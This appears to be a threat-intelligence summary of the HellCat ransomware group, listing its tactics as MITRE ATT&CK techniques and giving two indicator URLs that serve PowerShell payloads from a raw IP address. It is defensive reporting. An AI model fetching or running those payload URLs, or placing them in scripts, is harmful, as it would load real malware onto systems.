FOCUS MODE
EXTRACT IOC
Threat Research

HellCat Ransomware: Exposing the TTPs of a Rising Ransomware Threat in 2025

Picussecurity
HellCat Ransomware: Exposing the TTPs of a Rising Ransomware Threat in 2025
HellCat Ransomware is a significant cyber extortion group that emerged in 2024, using advanced phishing techniques and exploiting vulnerabilities to target organizations. Their operations focus on data exfiltration and aggressive ransom demands, often collaborating with the Morpheus group. This article analyzes their tactics, techniques, and procedures to better understand their threat. Affected: organizations, cyber security sectors

Keypoints :

  • HellCat Ransomware specializes in targeted cyber extortion and data exfiltration.
  • The group uses sophisticated phishing tactics, including malicious email attachments.
  • They exploit vulnerabilities in public-facing applications, particularly targeting systems like Atlassian Jira.
  • They employ a double extortion tactic, exfiltrating sensitive data before encrypting systems.
  • HellCat utilizes attention-grabbing ransom demands to increase pressure on victims.
  • Common tools are used in their operations to avoid detection, allowing stealthy lateral movement.
  • A layered defense approach is recommended for organizations to mitigate HellCat ransomware attacks.

MITRE Techniques :

  • T1566.001: Phishing: Spearphishing Attachment – Use of spearphishing emails with malicious attachments for initial access.
  • T1190: Exploit Public-Facing Application – Targeting vulnerabilities in systems to gain remote access.
  • T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Adding malicious scripts to Windows Registry to ensure they execute at login.
  • T1620: Reflective Code Loading – Executing malicious code in memory to evade file detection.
  • T1562.001: Disable or Modify Tools – Bypassing Antimalware Scan Interface to execute PowerShell malware unimpeded.
  • T1059.001: Command and Scripting Interpreter: PowerShell – Using PowerShell scripts for executing payloads and establishing C2 channels.
  • T1046: Network Service Discovery: Utilizing tools like Netscan for mapping networks.
  • T1218: Signed Binary Proxy Execution – Executing malicious actions using trusted binaries.
  • T1021: Remote Services – Leveraging legitimate remote utilities for lateral movement.
  • T1078: Valid Accounts – Using stolen or default credentials for stealth operations.

Indicator of Compromise :

  • [URL] http://45.200.148.157:8878/payload.ps1
  • [URL] http://45.200.148.157:8878/payload2.ps1

Full Story: https://www.picussecurity.com/resource/blog/hellcat-ransomware

Tags: EDR, VIRUS, TOOL, PAYLOAD, WINDOWS, PROXY, DISCOVERY, IMPACT